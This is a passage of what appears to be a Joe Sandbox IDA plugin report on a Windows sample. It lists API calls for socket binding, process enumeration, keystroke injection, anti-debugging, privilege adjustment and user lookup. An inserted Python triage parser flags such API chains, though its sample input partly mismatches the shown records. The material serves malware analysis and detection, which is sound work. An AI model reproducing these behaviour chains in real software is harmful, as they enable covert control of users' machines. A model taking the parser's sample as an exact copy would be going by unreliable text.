                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00349A4E
                        • GetSysColor.USER32(0000000F), ref: 00349B23
                        • SetBkColor.GDI32(?,00000000), ref: 00349B36
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$LongProcWindow
                        • String ID:
                        • API String ID: 3131106179-0
                        • Opcode ID: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                        • Instruction ID: ccc2c9f3ac840612bc20cc63fcfbfd93267e7e63c35db068a32e50363d256a5f
                        • Opcode Fuzzy Hash: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                        • Instruction Fuzzy Hash: 17A1FA70108554AEE727BA3C8C89F7B2ADEDB82350F26425BF502DEA91CA25FD01D375
                        APIs
                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B185D
                        • WSAGetLastError.WSOCK32 ref: 003B1884
                        • bind.WSOCK32(00000000,?,00000010), ref: 003B18DB
                        • WSAGetLastError.WSOCK32 ref: 003B18E6
                        • closesocket.WSOCK32(00000000), ref: 003B1915
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 1601658205-0
                        • Opcode ID: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                        • Instruction ID: 858fdf1ca7918442159595ea6ac2b36a1e2e5549f4d4394aac32936f18047765
                        • Opcode Fuzzy Hash: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                        • Instruction Fuzzy Hash: B551C675A002006FEB12AF24C8D6F6A77E5AB44718F44845CFA059F7D3C771AD418BA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 13fd7899a170efc12ac2f50ea4b35fd8a741adf0ab5dd8394d0bd14dd2d27a6a
                        • Instruction ID: 8c6d46de37e3654da65fd0feecbf3f28732e22c8954194536372a3d2db79cbcc
                        • Opcode Fuzzy Hash: 13fd7899a170efc12ac2f50ea4b35fd8a741adf0ab5dd8394d0bd14dd2d27a6a
                        • Instruction Fuzzy Hash: AB2191317402105FD7229F1AC884F6A7BA9EF96315F1AD06CE84ACB352CB71EC42DB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                        • Instruction ID: 32c543e1319d82574ac451ef6b42341d37e8f0ea581a6d3d301411560b42454d
                        • Opcode Fuzzy Hash: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                        • Instruction Fuzzy Hash: D4A2A174E0061ACBDF36CF58C8917AEB7B1BF44310F2585A9E819AB681DB749D81CF90
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003982AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($tb?$|
                        • API String ID: 1659193697-3876775998
                        • Opcode ID: 54ade3c8e066eb6be6e253be59b3ae2b0ae003116d341eae48e49cb4d0e5ef99
                        • Instruction ID: 19b434b85b6818954757c90e8d4a3b2e87b616321c5a0961e58d22a92e9f8d09
                        • Opcode Fuzzy Hash: 54ade3c8e066eb6be6e253be59b3ae2b0ae003116d341eae48e49cb4d0e5ef99
                        • Instruction Fuzzy Hash: 34323679A006059FCB29CF59C481A6AB7F0FF88710B15C46EE59ADB7A1EB70E941CB40
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003BA6AC
                        • Process32FirstW.KERNEL32(00000000,?), ref: 003BA6BA
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • Process32NextW.KERNEL32(00000000,?), ref: 003BA79C
                        • CloseHandle.KERNEL32(00000000), ref: 003BA7AB
                          • Part of subcall function 0034CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00373303,?), ref: 0034CE8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                        • String ID:
                        • API String ID: 1991900642-0
                        • Opcode ID: fdd48546a65eb95a308556c414628454fa6a2e3b231516e556af2e6cfed37f8d
                        • Instruction ID: 7048ec05c7541bc8f3ef34f6fd1d815a2bcdab33873b74f8d3527209a8f8e499
                        • Opcode Fuzzy Hash: fdd48546a65eb95a308556c414628454fa6a2e3b231516e556af2e6cfed37f8d
                        • Instruction Fuzzy Hash: 4B514C75508700AFD711EF25C886A6BBBE8FF89754F00891DF589DB261EB70E904CB92
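The function records on this page list each function's imports as lines of the form `• Api.MODULE(args), ref: ADDR`, with calls made from callees prefixed `Part of subcall function XXXX:`. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin. It turns those lines into structured call records and flags API chains that appear together inside one function, such as the Toolhelp32 process-enumeration loop in the record just above and the LookupPrivilegeValue/AdjustTokenPrivileges/ExitWindowsEx sequence earlier on the page. The sample input is the API lines of those two records copied from this page; the chain rules and the A/W-suffix normalisation are this example's own triage heuristics, not Joe Sandbox signatures.

```python
"""Parse the per-function 'APIs' listings emitted by the Joe Sandbox IDA plugin
and flag API chains that deserve a closer look during triage."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the API lines of two function records from this
# report, keyed by the address of the call the record is named after.
SAMPLE_RECORDS = {
    "003BA6AC": """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 003BA6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 003BA6BA
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• Process32NextW.KERNEL32(00000000,?), ref: 003BA79C
• CloseHandle.KERNEL32(00000000), ref: 003BA7AB
""",
    "0039E932": """\
  • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
  • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
  • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
• ExitWindowsEx.USER32(?,00000000), ref: 0039E932
""",
}

# One listing line: optional subcall prefix, Api.MODULE, optional (args), ref: ADDR.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str                  # name as written in the report, e.g. Process32FirstW
    module: str               # DLL/library token, e.g. KERNEL32
    args: tuple               # raw argument tokens; '?' means the plugin could not resolve one
    ref: str                  # address of the call site
    subcall: Optional[str]    # address of the callee when the call is made from a subcall

    @property
    def base(self) -> str:
        """Drop a trailing ANSI/Unicode suffix so one rule matches FooA and FooW.
        Heuristic: only strips A/W that follows a lowercase letter or digit."""
        return re.sub(r"(?<=[a-z0-9])[AW]$", "", self.api)


def parse_api_lines(text: str) -> list:
    """Parse one record's API lines; raise on a line the regex does not recognise."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(),
                             m["subcall"].upper() if m["subcall"] else None))
    return calls


# Triage rules (this example's own): every listed base name must occur in the
# same function record, whether directly or through a subcall.
CHAIN_RULES = {
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "shutdown-privilege": {"LookupPrivilegeValue", "AdjustTokenPrivileges", "ExitWindowsEx"},
    "recursive-delete": {"FindFirstFile", "DeleteFile", "FindNextFile"},
    "listening-socket": {"socket", "bind", "listen"},
    "synthetic-input": {"SetKeyboardState", "SendInput"},
}


def match_chains(calls: list) -> list:
    """Return the sorted names of every rule whose APIs are all present."""
    present = {c.base for c in calls}
    return sorted(name for name, needed in CHAIN_RULES.items() if needed <= present)


def triage(records: dict) -> dict:
    """Map each function record (keyed by address) to the chains it matches."""
    return {addr: match_chains(parse_api_lines(text)) for addr, text in records.items()}


if __name__ == "__main__":
    for addr, hits in triage(SAMPLE_RECORDS).items():
        print(addr, ", ".join(hits) if hits else "-")
```

The rules deliberately key on base names rather than exact imports, so a record that reaches `Process32First` through a subcall is scored the same as one that calls it directly; the `subcall` field is kept on each record so a reviewer can still see which function actually issued the call.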
                        APIs
                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0039AAAC
                        • SetKeyboardState.USER32(00000080), ref: 0039AAC8
                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0039AB36
                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0039AB88
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                        • Instruction ID: 3a30f7031821ea092ed3f1cc24f454f04d4cd3f1b9816adb6206d0b91777532a
                        • Opcode Fuzzy Hash: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                        • Instruction Fuzzy Hash: 16313930A40A08AFFF37CB69CC05BFA7BAAAB45310F04431AF585961D0D7749981C7E2
                        APIs
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 003ACE89
                        • GetLastError.KERNEL32(?,00000000), ref: 003ACEEA
                        • SetEvent.KERNEL32(?,?,00000000), ref: 003ACEFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorEventFileInternetLastRead
                        • String ID:
                        • API String ID: 234945975-0
                        • Opcode ID: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                        • Instruction ID: 846471081dff75d0e1203f9e704612a671f28718d053a83691fded423dc8a8bd
                        • Opcode Fuzzy Hash: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                        • Instruction Fuzzy Hash: 5321BDB1510305AFEB22CF65C948FA677FCEB02355F10582EE646D2551EB70EE08CB90
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A5CC1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A5D17
                        • FindClose.KERNEL32(?), ref: 003A5D5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 6abd67e4017969cde8b9ec8283c722d779a0e029e3fb4a2135e8edf214986ce9
                        • Instruction ID: 7f5a5bd4d1c107af27fbc7000110c3facabde792f11016e2fa7ac9e1b407d2ea
                        • Opcode Fuzzy Hash: 6abd67e4017969cde8b9ec8283c722d779a0e029e3fb4a2135e8edf214986ce9
                        • Instruction Fuzzy Hash: D4517674604A019FC716DF28C494E9AB7E4FF4A324F15855DE99A8B3A1CB30E905CF91
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0036271A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00362724
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00362731
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                        • Instruction ID: 2ca9a34d2f398b57737d398b075726577ebed4bb580a4a943537b43efcaf787a
                        • Opcode Fuzzy Hash: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                        • Instruction Fuzzy Hash: 5831D67491121C9BCB22DF64DC88BDDB7B8AF08310F5081EAE80CA7261E7349F858F54
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A51DA
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003A5238
                        • SetErrorMode.KERNEL32(00000000), ref: 003A52A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                        • Instruction ID: 75f928f6152a403f2a0f7bc0adb3b284f1713daeb9fd204a3edb79d4b338f7c0
                        • Opcode Fuzzy Hash: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                        • Instruction Fuzzy Hash: 82315A75A10508DFDB01DF54D884EADBBB4FF49314F088499E809AB362CB31E846CB90
                        APIs
                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                        • GetLastError.KERNEL32 ref: 0039174A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 577356006-0
                        • Opcode ID: 8b70d2283dc36b637d41309b4134900ca7ce628b22d3225bf04ccc18e3aac080
                        • Instruction ID: 0deebe9c8d881015b913e5af9d5a556d6a2b5e1de37ef15fb0c3845e0d429959
                        • Opcode Fuzzy Hash: 8b70d2283dc36b637d41309b4134900ca7ce628b22d3225bf04ccc18e3aac080
                        • Instruction Fuzzy Hash: FD11BFB2810205AFE7199F54EC86D6AB7FDEF04714B24852EE05696241EB70FC418B20
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D608
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0039D645
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D650
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                        • Instruction ID: 79cfc0ec1a97c7d93ffd90e208e935751d77f3705b3b2d058903051104dd0bd1
                        • Opcode Fuzzy Hash: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                        • Instruction Fuzzy Hash: A711A175E01228BFDB118F95EC45FAFBFBCEB45B50F108115F908E7290C2705A018BA1
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0039168C
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003916A1
                        • FreeSid.ADVAPI32(?), ref: 003916B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                        • Instruction ID: 4ba5c7f60f2a58d293f6a71a2878d68bf2faafe9ea32e2bf6cb027b93f617523
                        • Opcode Fuzzy Hash: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                        • Instruction Fuzzy Hash: D4F0F4B1950309FBDF01DFE49C89EAEBBBCFB08704F504565E901E2181E774EA448B54
                        APIs
                        • GetCurrentProcess.KERNEL32(003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D09
                        • TerminateProcess.KERNEL32(00000000,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D10
                        • ExitProcess.KERNEL32 ref: 00354D22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                        • Instruction ID: 0765d98dee9a788d01b1a8da1390804827760c0da87ace476efdf78f757a6b39
                        • Opcode Fuzzy Hash: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                        • Instruction Fuzzy Hash: DFE09231410188ABCB16AF54EE09E583BA9AB41786F159018FC098B133CB3AE986CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: /
                        • API String ID: 0-2043925204
                        • Opcode ID: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                        • Instruction ID: cb6919c20c520b5182a3ac5e288743cb954d780f89be4fd0a97b8e03b52f82ab
                        • Opcode Fuzzy Hash: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                        • Instruction Fuzzy Hash: F64149769002196FCB21DFB9CC5CDBB7778EB84314F208669F945CB284E6709D41CB50
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 0038D28C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
